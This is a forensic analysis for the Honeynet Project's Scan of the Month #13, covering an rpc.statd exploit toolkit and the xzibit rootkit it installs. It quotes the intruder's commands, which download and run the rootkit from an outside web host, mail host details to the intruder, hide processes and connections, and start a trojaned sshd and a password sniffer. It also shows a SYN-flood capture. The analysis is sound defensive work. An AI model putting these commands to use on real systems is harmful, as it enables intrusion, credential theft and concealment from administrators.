This report attempts to answer the questions of the #13 Scan of the Month proposed by the Honeynet Project. For more information about this challenge go to http://project.honeynet.org/scans/scan13. An analysis of the rootkit installed on the systems compromised by this tool is also provided in this report; the rootkit file, named xzibit.tar.gz, was copied from the web site http://www.becys.org/ mentioned in the command executed on the compromised hosts.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

1. What is the blackhat attempting to do with his command line syntax?

The command "luckgo" executed by the intruder expects to receive up to three numbers describing the network that will be scanned; these numbers are the first octets of an IP address. As an example, to scan the network 192.168.254.0 you would execute the following command:

----------------------------------------------------------------------
#./luckgo 192 168 254
----------------------------------------------------------------------

The command executed by the intruder scans the following ranges of IP addresses (each invocation was given two octets, so every range is a full /16, i.e. 65,536 addresses):

* 216.210.0.0 to 216.210.255.255
* 200.120.0.0 to 200.120.255.255
* 64.120.0.0 to 64.120.255.255
* 216.200.0.0 to 216.200.255.255
* 63.1.0.0 to 63.1.255.255
* 216.10.0.0 to 216.10.255.255
* 210.120.0.0 to 210.120.255.255
* 64.1.0.0 to 64.1.255.255
* 216.1.0.0 to 216.1.255.255
* 194.1.0.0 to 194.1.255.255
* 210.128.0.0 to 210.128.255.255
* 24.1.0.0 to 24.1.255.255
* 12.20.0.0 to 12.20.255.255

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

2. What does the tool accomplish?

This tool is used to scan a range of IP addresses looking for the presence of the portmapper service (port 111). If this port is open, the rpc.statd exploit is launched against the host with RedHat 6.2 selected as the target; if the host is running a vulnerable version of the rpc.statd daemon the exploit obtains a root shell, downloads and installs a rootkit and removes the installation files. The installation of the rootkit sends a mail to the intruder announcing the newly compromised host.
More information about the rpc.statd vulnerability exploited by this toolkit can be found at the following web sites:

* http://www.kb.cert.org/vuls/id/34043
* http://www.cert.org/advisories/CA-2000-17.html
* http://www.securityfocus.com/bid/1480
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0666

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

3. How does the tool work?

The file LUCKROOT.TAR downloaded by the intruder contains five files; their types and MD5 checksums are shown below:

----------------------------------------------------------------------
luckgo:        Bourne shell script text
luckscan-a:    ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
luckscan-a.c:  C program text
luckstatdx:    ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
luckstatdx.c:  C program text

0a2d4298ccb41bd373e78d5e4352ff87  luckgo
b36e9546ef43e8d0c2f81f9be1941548  luckscan-a
d45ce49e8fb022f1e07e301adbc34f62  luckscan-a.c
841edfb338ce9461d9f3985d9adfe67b  luckstatdx
92a17e0d029193ad40981002b6cb8926  luckstatdx.c
----------------------------------------------------------------------

The script luckgo is the primary interface of the toolkit; its job is to perform three steps:

1. Receive up to three arguments representing the first octets of an IP address.
2. Check for the existence of the binaries luckstatdx and luckscan-a and, if they do not exist, create them.
3. Execute luckscan-a, passing as arguments the octets received and the number 111, the port to scan.

The tool luckscan-a is a port scanner that looks for a given port across a range of IP addresses and, if the port is open, tries to run the exploit luckstatdx against that host. The arguments used to start this tool come from the script luckgo and represent the octets of the IP address and the port to scan.
The following line was taken from the luckgo script; it is the line used to start the scan:

----------------------------------------------------------------------
./luckscan-a $1 111 $2 $3
----------------------------------------------------------------------

As we can see, the arguments received by the script are passed on to the scanner. The added argument (111) is the portmapper port number, which luckscan-a will look for on every host in the range.

One thing to note is that the command line which executes the exploit luckstatdx specifies the switch "-d 0"; reading the source of the exploit, this selects RedHat 6.2 as the target.

The exploit luckstatdx is the last tool executed. It tries to gain root on the scanned host by exploiting the rpc.statd vulnerability (BUGTRAQ ID 1480); if it succeeds it opens a shell and executes the following commands:

----------------------------------------------------------------------
# cd /
# uname -a
# id
# wget -nd http://www.becys.org/xzibit.tar.gz
# tar -zxvf xzibit.tar.gz
# cd lamerk
# ./install
# cd /
# rm -rf lamerk xzibit.tar.gz
----------------------------------------------------------------------

As we can see, these commands download a package, extract it, execute a file named "install" and then remove both the package and the extracted directory. I downloaded the file xzibit.tar.gz; the analysis of the files contained in the package is shown below.
The package, when extracted, creates a directory called lamerk containing the following files (file types and MD5 checksums shown):

----------------------------------------------------------------------
lamerk/becys.cgi:       ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
lamerk/hdparm:          Bourne shell script text
lamerk/ifconfig:        ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
lamerk/install:         Bourne shell script text
lamerk/linsniffer:      ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
lamerk/logclear:        ASCII text
lamerk/netstat:         ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
lamerk/ps:              ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
lamerk/s:               ASCII text
lamerk/sense:           perl script text
lamerk/sl2:             ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
lamerk/ssh_host_key:    data
lamerk/ssh_random_seed: data
lamerk/sshdu:           ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
lamerk/top:             ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped

202a51b16ac8d1b4dc75de89e7344ed4  lamerk/becys.cgi
a8caf6a5d3b38a6819d57fe90cffe6a0  lamerk/hdparm
086394958255553f6f38684dad97869e  lamerk/ifconfig
042d413b164982037f21bf4671623938  lamerk/install
6c0f96c1e43a23a21264f924ae732273  lamerk/linsniffer
5f22ceb87631fbcbf32e59234feeaa5b  lamerk/logclear
2b07576213c1c8b942451459b3dc4903  lamerk/netstat
7728c15d89f27e376950f96a7510bf0f  lamerk/ps
2cd5a033331802ca763882ca44227951  lamerk/s
464dc23cac477c43418eb8d3ef087065  lamerk/sense
4cfae8c44a6d1ede669d41fc320c7325  lamerk/sl2
ec411d19fb0cd1c45e2e63f9a978315d  lamerk/ssh_host_key
a869d3599328d53387328ab6c254e314  lamerk/ssh_random_seed
22eb6d3381a60a850d99b971f93966cc  lamerk/sshdu
8ff0939cd49a0b2ef3156c7876afca4b  lamerk/top
----------------------------------------------------------------------

The file install, the first file executed by the intruder, is a shell script that performs the following actions:

1 - The shell variable HISTFILE is unset, so the commands run during the installation are not saved to the shell history.
2 - The owner and group of the files contained in the package are changed to root:root.
3 - The system binaries "ifconfig", "netstat", "ps" and "top" are replaced by the trojaned versions contained in the package.
4 - Two files called /dev/dsx and /dev/caca are created and a series of "echo" commands writes their contents. The commands executed are the following:

----------------------------------------------------------------------
touch /dev/dsx >/dev/dsx
echo "3 sl2" >>/dev/dsx
echo "3 sshdu" >>/dev/dsx
echo "3 linsniffer" >>/dev/dsx
echo "3 smurf" >>/dev/dsx
echo "3 slice" >>/dev/dsx
echo "3 mech" >>/dev/dsx
echo "3 muh" >>/dev/dsx
echo "3 bnc" >>/dev/dsx
echo "3 psybnc" >> /dev/dsx
touch /dev/caca >/dev/caca
echo "1 193.231.139" >>/dev/caca
echo "1 213.154.137" >>/dev/caca
echo "1 193.254.34" >>/dev/caca
echo "3 6969" >>/dev/caca
echo "3 3666" >>/dev/caca
echo "3 31221" >>/dev/caca
echo "3 22546" >>/dev/caca
echo "4 6969" >>/dev/caca
echo "4 2222" >>/dev/caca
echo "Done"
----------------------------------------------------------------------

As we can note, the syntax of these files is the same as that used by lrk4 (the Linux Rootkit version 4). The file /dev/dsx is the configuration file that tells the trojaned versions of "ps" and "top" which processes to hide by name: the rootkit's own sl2, sshdu and linsniffer, plus the DoS tools and IRC bots/bouncers (smurf, slice, mech, muh, bnc, psybnc) the intruder expects to run later. The file /dev/caca is the configuration file used by the trojaned version of netstat; it hides connections (i) from the networks 193.231.139, 213.154.137 and 193.254.34, (ii) to the local ports 6969, 3666, 31221 and 22546 and (iii) to the remote ports 6969 and 2222.
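To make the effect of these two files concrete, here is an added example (written for this report, not code from the rootkit or from lrk4) that applies the rules above to constructed ps and netstat output and shows which lines the trojaned binaries would suppress. The rule meanings are the ones given above; the exact matching details (network prefix matched on octet boundaries against either endpoint, exact port match, basename of the command) are assumptions rather than lrk4's own implementation.

```python
"""Which ps and netstat entries the xzibit trojans would hide.

Added example for this report, not code taken from the rootkit or from lrk4.
It applies the /dev/dsx and /dev/caca rules written by the install script to
constructed ps / netstat output, using the rule meanings given in the analysis:
/dev/dsx  "3 <name>"   hides processes whose command name is <name>
/dev/caca "1 <prefix>" hides connections involving an address under <prefix>
          "3 <port>"   hides connections with that local port
          "4 <port>"   hides connections with that remote port
Matching details (prefix on octet boundaries, either endpoint for type 1,
exact port match, basename of the command) are assumptions.
"""

# The rules exactly as the install script writes them (constructed copy).
DSX_RULES = """\
3 sl2
3 sshdu
3 linsniffer
3 smurf
3 slice
3 mech
3 muh
3 bnc
3 psybnc
"""

CACA_RULES = """\
1 193.231.139
1 213.154.137
1 193.254.34
3 6969
3 3666
3 31221
3 22546
4 6969
4 2222
"""

# Constructed sample output of an untrojaned "ps ax" and "netstat -an" on a victim.
PS_OUTPUT = """\
  PID TTY      STAT   TIME COMMAND
    1 ?        S      0:04 init
  412 ?        S      0:00 /dev/ida/.inet/sshdu -f ./s
  415 ?        S      0:01 /dev/ida/.inet/linsniffer
  500 pts/0    S      0:00 -bash
  611 pts/0    R      0:00 ps ax
"""

NETSTAT_OUTPUT = """\
tcp        0      0 10.0.0.5:6969           193.231.139.20:1043     ESTABLISHED
tcp        0      0 10.0.0.5:22             192.168.1.10:40123      ESTABLISHED
tcp        0      0 0.0.0.0:3666            0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:1025           10.9.9.9:2222           ESTABLISHED
tcp        0      0 10.0.0.5:80             213.154.1.5:50000       ESTABLISHED
"""


def parse_rules(text):
    """Parse an lrk-style config file into (type, value) pairs; junk lines are ignored."""
    rules = []
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0].isdigit():
            rules.append((int(parts[0]), parts[1].strip()))
    return rules


def addr_matches(addr, prefix):
    """Prefix match on octet boundaries: 193.231.139 matches 193.231.139.20,
    but 213.154.137 does not match 213.154.1.5 (assumed matching rule)."""
    return addr == prefix or addr.startswith(prefix + ".")


def process_hidden(command, dsx_rules):
    """True when a '3 <name>' rule names the basename of the command."""
    if not command.strip():
        return False
    name = command.split()[0].rsplit("/", 1)[-1]
    return any(rtype == 3 and value == name for rtype, value in dsx_rules)


def connection_hidden(local, remote, caca_rules):
    """local/remote are 'addr:port' strings as printed by netstat -an."""
    laddr, lport = local.rsplit(":", 1)
    raddr, rport = remote.rsplit(":", 1)
    for rtype, value in caca_rules:
        if rtype == 1 and (addr_matches(laddr, value) or addr_matches(raddr, value)):
            return True
        if rtype == 3 and value == lport:
            return True
        if rtype == 4 and value == rport:
            return True
    return False


def filter_ps(output, dsx_text=DSX_RULES):
    """Return (shown, hidden) lists of ps lines; the header is always shown."""
    rules = parse_rules(dsx_text)
    shown, hidden = [], []
    for line in output.splitlines():
        fields = line.split(None, 4)
        if len(fields) < 5 or not fields[0].isdigit():
            shown.append(line)          # header or malformed line
            continue
        (hidden if process_hidden(fields[4], rules) else shown).append(line)
    return shown, hidden


def filter_netstat(output, caca_text=CACA_RULES):
    """Return (shown, hidden) lists of 'netstat -an' TCP/UDP lines."""
    rules = parse_rules(caca_text)
    shown, hidden = [], []
    for line in output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] not in ("tcp", "udp"):
            shown.append(line)
            continue
        (hidden if connection_hidden(fields[3], fields[4], rules) else shown).append(line)
    return shown, hidden


if __name__ == "__main__":
    for title, (shown, hidden) in (("ps", filter_ps(PS_OUTPUT)),
                                   ("netstat", filter_netstat(NETSTAT_OUTPUT))):
        print(f"== {title}: {len(hidden)} line(s) hidden by the trojan ==")
        for line in hidden:
            print("  " + line)
```

Running it lists the two sshdu/linsniffer process lines and the three connections (the sshd on 6969, the listener on 3666 and the outbound connection to remote port 2222) that would vanish from ps and netstat. The same parser can be pointed at a /dev/dsx or /dev/caca recovered from a compromised host to enumerate what the intruder chose to hide; note that a type-1 prefix rule removes every connection to an entire /24 of the intruder's networks, not just single hosts.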
5 - A directory called /dev/ida/.inet is created and the files linsniffer, logclear, sense, sl2, sshdu, s, ssh_host_key and ssh_random_seed are moved into it; the file tcp.log is created in the same directory.
6 - A line executing /usr/bin/hdparm is inserted into the file /etc/init.d/rc.sysinit, so that the rootkit's processes are started again at every boot.
7 - The script file hdparm is copied into the directory /usr/bin.
8 - The file system is searched for a cgi-bin directory: the common locations are checked and, if the directory is found, the file becys.cgi is copied into it.
9 - Network and system information is written to the file /tmp/info and this file is mailed to the account becys@becys.org. The commands executed are the following:

----------------------------------------------------------------------
touch /tmp/info
/sbin/ifconfig | grep inet >> /tmp/info
hostname -f >> /tmp/info
uname -a >> /tmp/info
cat /tmp/info | mail -s "becys rewting" becys@becys.org
rm -f /tmp/info
----------------------------------------------------------------------

10 - The last action taken by the script is to remove the package and the files used during the installation of the rootkit.

The file becys.cgi is a CGI program that tries to set its uid and gid to 0 (root) and then executes the command specified by the intruder. It is important to note that a process must already be privileged for setuid(0) and setgid(0) to succeed, so either the web server has to be running as root or the intruder has to make the binary setuid root; otherwise both calls fail with EPERM, as the strace output below shows, and the commands are executed under the account that runs the web server. The image file becys-cgi.jpg located in this same directory shows the HTML interface of this program, and below is shown the output of the strace command.

....
getpid()                                = 10652
brk(0)                                  = 0x8049c0c
brk(0x8049d24)                          = 0x8049d24
brk(0x804a000)                          = 0x804a000
setuid(0)                               = -1 EPERM (Operation not permitted)
setgid(0)                               = -1 EPERM (Operation not permitted)
fstat(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(4, 1), ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000
ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
write(1, "\n", 7)                       = 7
write(1, "\n", 7)                       = 7
write(1, "\n", 15)                      = 15
munmap(0x40014000, 4096)                = 0
_exit(0)                                = ?
....

The script file hdparm is executed by the intruder during the installation of this rootkit, and the initialization files of the system are modified to guarantee that this script is executed again whenever the system boots. The script starts sshdu, the daemon the intruder uses to access the compromised system, and linsniffer, the sniffer installed by the intruder. The contents of this file are shown below:

----------------------------------------------------------------------
#!/bin/sh
cd /dev/ida/.inet
./sshdu -f ./s
./linsniffer >> ./tcp.log &
cd /
----------------------------------------------------------------------

The file ifconfig is a trojaned version that hides from the user the fact that the network interface is in promiscuous mode (which the sniffer requires); this file is probably the same one that is present in lrk4 (the Linux Rootkit version 4).

The files ps, netstat and top are trojaned versions that hide the processes and network connections specified by the intruder. More information can be found in the analysis of the "install" script under question 3 above. The strings found in the binaries show that the configuration files /dev/dsx and /dev/caca are referenced by these files. Like ifconfig, these files are probably the same as those in lrk4 (the Linux Rootkit version 4). The strings found in these files are shown below:

----------------------------------------------------------------------
# strings ps
....
u$hW
}(h&
PRQSh
90tO
t%VW
8&t/F8&t*F8&t%F
/dev/dsx
  NR PID STACK ESP EIP TMOUT ALARM STAT TTY TIME COMMAND
  PID TTY MAJFLT MINFLT TRS DRS SIZE SWAP RSS SHRD LIB DT COMMAND
  PID TTY STAT TIME PAGEIN TSIZ DSIZ RSS LIM %MEM COMMAND
  UID PID SIGNAL BLOCKED IGNORED CATCHED STAT TTY TIME COMMAND
 PPID PID PGID SID TTY TPGID STAT UID TIME COMMAND
USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND
 FLAGS UID PID PPID PRI NI SIZE RSS WCHAN STA TTY TIME COMMAND
  PID TTY STAT TIME COMMAND
sort
unrecognized long sort option
help
version
ps: unknown long option
short form sort flag parse error
unrecognized option or trailing garbage
the name `%s' is not a tty
%susage: ps -acehjlnrsSuvwx{t|#|O[-]u[-]U..} \
  --sort:[-]key1,[-]key2,...
  --help gives you this message
  --version prints version information
COMMAND
%04.4x
No processes available.
%5d %3s %s
%-9x %-11.11s
%6x %5d %5d %5d %3d %3d %6d %5d %-11.11s
%s%3s %5d %5d %5d %5d
%3s %5d %s
%5d %5d %-8s %5d %2u.%u
%2d.%d
%5d %5d %2s %s%.6s
%5d %5d %08x %08x %08x %08x %s %3s
%6d %4d %4d %4d xx
%5d %2d.%d
%5d %3s
%6d %6d
%5d %5d %5d %5d %5d %5d %5d %3d %2d
%5d %8x %8x %8x %s %s %s %3s
...
----------------------------------------------------------------------

----------------------------------------------------------------------
# strings top
...
Page Fault Count
Nice Value
Priority
Controlling tty
Memory Usage
CPU Usage
User Name
User Id
Parent Process Id
Process Id
/dev/dsx
Wrong configuration option %c
/etc/toprc
HOME
HOME
.toprc
AbcDgHIjklMnoTPqrsuzVYEFWX
TERM
VT100
top: ioctl() failed
cannot put tty into raw mode
top: Bad delay time `%s'
top: Bad delay time `%s'
-d requires an argument
top: setpriority() failed
top: Unknown argument `%c'
%s%s%s%s That's not a number!
%s%s%s%s That's not a float!
Current Field Order: %s
%c %c: %-10s = %s
Current Field Order: %s
Upper case characters move a field to the left, lower case to the right
Current Field Order: %s
Toggle fields with a-x, any other key to return:
----------------------------------------------------------------------

----------------------------------------------------------------------
# strings netstat
...
8&t/F8&t*F8&t%F
+NEW_ADDRT +RTF_IRTT +RTF_REJECT +RT_NETLINK +FW_MASQUERADE -NLS
AF:(inet) +UNIX +INET +IPX -AX25 -NETROM -ATALK
HW: +ETHER +ARC +SLIP +PPP +TUNNEL -TR -AX25 -NETROM -FR
Linux NET-3 Base Utilities
Source: net-tools 1.32-alpha
net-tools@lina.inka.de (Bernd Eckenfels)
Kernelsource: 2.0.35
netstat 1.19 (1996-05-17)
Fred Baumgarten and Alan Cox.
/dev/caca
/dev/route
netstat
%s: no support for `%s' on this system.
Netlink Kernel Messages (continous)
read /dev/route
net-tools@lina.inka.de (Bernd Eckenfels)
netlink message size mismatch
netstat.c
%s: Internal Error `%s'.
Contact: %s
NEWROUTE
DELROUTE
NEWDEVICE
DELDEVICE
UNKNOWN%lx
%s/%s
0x%x
%d
----------------------------------------------------------------------

Note that the trojaned netstat identifies itself as netstat 1.19 from net-tools 1.32-alpha built against kernel source 2.0.35, far older than the net-tools shipped with RedHat 6.2; a simple "netstat --version" would already have given it away.

The binary file linsniffer is a network sniffer. The source for this file can be found in the lrk4 (Linux Rootkit version 4) distribution. The default configuration of this sniffer is to log the data of ftp, telnet, imap2, rlogin, pop2 and pop3 sessions, i.e. the cleartext protocols that carry usernames and passwords.

The ASCII file logclear contains shell commands used to clean the log file generated by linsniffer (tcp.log): it kills the linsniffer process, deletes and recreates an empty tcp.log file and starts the sniffer again.

The files sshdu, s, ssh_host_key and ssh_random_seed are respectively the ssh daemon, the sshd configuration file, the private host key of the daemon and its random seed. This is a trojaned daemon used by the intruder to access the machine remotely; the configuration file sets it to listen on port 6969, which is one of the local ports hidden by the trojaned netstat.
The file sense is a perl script that parses the output generated by linsniffer, looking for the usernames and passwords collected by the sniffer.

The file sl2 is a denial of service tool that sends a SYN flood to a target host; the source addresses can be randomized and a port range to be attacked can be given. Below is shown a network capture of the activity generated by this tool: note that the source hosts are randomized and the destination ports are incremented as specified on the command line. The command line used to start the tool was "./sl2 0 192.168.254.32 0 139" (randomized sources against 192.168.254.32, ports 0 to 139).

----------------------------------------------------------------------
        --== Initializing Snort ==--
TCPDUMP file reading mode.
Reading network traffic from "snort-0311@0038.log" file.
snaplen = 1514

        --== Initialization Complete ==--

03/11-00:38:28.548709 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
13.78.227.187:12978 -> 192.168.254.32:1 TCP TTL:30 TOS:0x0 ID:65081 IpLen:20 DgmLen:40
******S* Seq: 0x37AB17AB  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.548721 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
56.139.190.165:2274 -> 192.168.254.32:0 TCP TTL:30 TOS:0x0 ID:21459 IpLen:20 DgmLen:40
******S* Seq: 0x2B659215  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.548909 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
61.249.122.180:38310 -> 192.168.254.32:2 TCP TTL:30 TOS:0x0 ID:5782 IpLen:20 DgmLen:40
******S* Seq: 0x185AC415  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.548954 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C
192.168.254.32:1 -> 13.78.227.187:12978 TCP TTL:128 TOS:0x0 ID:61812 IpLen:20 DgmLen:40
***A*R** Seq: 0x0  Ack: 0x37AB17AC  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.549188 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
12.240.167.89:21997 -> 192.168.254.32:3 TCP TTL:30 TOS:0x0 ID:39765 IpLen:20 DgmLen:40
******S* Seq: 0x753FF080  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.549089 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C
192.168.254.32:0 -> 56.139.190.165:2274 TCP TTL:128 TOS:0x0 ID:62068 IpLen:20 DgmLen:40
***A*R** Seq: 0x0  Ack: 0x2B659216  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.549163 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C
192.168.254.32:2 -> 61.249.122.180:38310 TCP TTL:128 TOS:0x0 ID:62324 IpLen:20 DgmLen:40
***A*R** Seq: 0x0  Ack: 0x185AC416  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.549415 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
101.22.7.157:52422 -> 192.168.254.32:4 TCP TTL:30 TOS:0x0 ID:53410 IpLen:20 DgmLen:40
******S* Seq: 0x66000A43  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.549397 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C
192.168.254.32:3 -> 12.240.167.89:21997 TCP TTL:128 TOS:0x0 ID:62580 IpLen:20 DgmLen:40
***A*R** Seq: 0x0  Ack: 0x753FF081  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.549642 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
117.168.88.130:6971 -> 192.168.254.32:5 TCP TTL:30 TOS:0x0 ID:12278 IpLen:20 DgmLen:40
******S* Seq: 0x3B80033D  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.549622 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C
192.168.254.32:4 -> 101.22.7.157:52422 TCP TTL:128 TOS:0x0 ID:62836 IpLen:20 DgmLen:40
***A*R** Seq: 0x0  Ack: 0x66000A44  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.549861 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
47.237.232.109:12130 -> 192.168.254.32:6 TCP TTL:30 TOS:0x0 ID:26599 IpLen:20 DgmLen:40
******S* Seq: 0x5EC38321  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.549848 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C
192.168.254.32:5 -> 117.168.88.130:6971 TCP TTL:128 TOS:0x0 ID:63092 IpLen:20 DgmLen:40
***A*R** Seq: 0x0  Ack: 0x3B80033E  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.550081 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
125.8.54.138:19933 -> 192.168.254.32:7 TCP TTL:30 TOS:0x0 ID:32248 IpLen:20 DgmLen:40
******S* Seq: 0x2DE1E6E3  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.550066 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C
192.168.254.32:6 -> 47.237.232.109:12130 TCP TTL:128 TOS:0x0 ID:63348 IpLen:20 DgmLen:40
***A*R** Seq: 0x0  Ack: 0x5EC38322  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.550300 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
78.203.99.179:28011 -> 192.168.254.32:8 TCP TTL:30 TOS:0x0 ID:53217 IpLen:20 DgmLen:40
******S* Seq: 0x6E43F951  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.550285 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C
192.168.254.32:7 -> 125.8.54.138:19933 TCP TTL:128 TOS:0x0 ID:63604 IpLen:20 DgmLen:40
***A*R** Seq: 0x0  Ack: 0x2DE1E6E4  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.550549 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
131.49.148.248:40940 -> 192.168.254.32:9 TCP TTL:30 TOS:0x0 ID:4057 IpLen:20 DgmLen:40
******S* Seq: 0x46A1657B  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.550504 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C
192.168.254.32:8 -> 78.203.99.179:28011 TCP TTL:128 TOS:0x0 ID:63860 IpLen:20 DgmLen:40
***A*R** Seq: 0x0  Ack: 0x6E43F952  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.550770 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36
208.40.184.255:33697 -> 192.168.254.32:10 TCP TTL:30 TOS:0x0 ID:2325 IpLen:20 DgmLen:40
******S* Seq: 0x4D7B06C  Ack: 0x0  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-00:38:28.550755 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C
192.168.254.32:9 -> 131.49.148.248:40940 TCP TTL:128 TOS:0x0 ID:64116 IpLen:20 DgmLen:40
***A*R** Seq: 0x0  Ack: 0x46A1657C  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

